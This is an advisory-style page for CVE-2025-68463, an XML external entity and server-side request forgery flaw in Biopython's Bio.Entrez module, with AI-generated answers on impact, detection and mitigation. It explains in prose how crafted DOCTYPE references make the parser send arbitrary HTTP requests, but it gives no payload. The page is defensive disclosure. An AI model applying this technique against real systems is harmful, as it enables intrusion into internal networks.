CVE-2025-68463
XXE Vulnerability in Biopython Bio.Entrez Through
Publication date: 2025-12-18
Last updated on: 2026-04-22
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| biopython | biopython | From 3.13.1 (inc) to 3.13.11 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-611 | The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
The vulnerability in CVE-2025-68463 affects the Bio.Entrez module in Biopython, where the XML parser processes external Document Type Definitions (DTDs) and XML Schema Definitions (XSDs) by fetching them via HTTP requests. This allows an attacker to craft malicious XML input containing external entity references (DOCTYPE declarations) that cause the parser to make arbitrary HTTP GET requests. This behavior leads to an XML External Entity (XXE) vulnerability and server-side request forgery (SSRF), enabling attackers to access internal network resources or cause denial-of-service conditions by forcing the server to make unwanted network requests. [1]
How can this vulnerability impact me? :
This vulnerability can impact you by allowing attackers to perform server-side request forgery (SSRF), which can lead to unauthorized access to internal network resources. Additionally, it can cause denial-of-service (DoS) conditions by forcing the server to make unwanted network requests. There is also a risk of man-in-the-middle (MITM) attacks and cache poisoning due to lack of enforced TLS on these requests, although these are secondary concerns. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for unusual HTTP GET requests initiated by the Bio.Entrez module when parsing XML, especially requests for external DTD or XSD files. Detection can include analyzing network traffic for unexpected outbound requests from systems running Biopython, particularly those triggered by XML parsing. Additionally, running the provided demonstration script (biopython_doctype_xxe_demo.py) can help confirm the presence of the vulnerability. Specific commands are not provided in the resources, but network monitoring tools like tcpdump or Wireshark can be used to capture and analyze such HTTP requests. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include disabling or restricting the use of external entity processing in the Bio.Entrez module to prevent fetching external DTD or XSD files. Avoid parsing untrusted XML input with the vulnerable Biopython versions. Applying patches or updates from the Biopython project that address this vulnerability is recommended. Additionally, network-level controls can be implemented to block outgoing HTTP requests initiated by the vulnerable module to untrusted external servers. Mitigating man-in-the-middle and cache poisoning risks may also help but are secondary to addressing the primary SSRF and XXE issues. [1]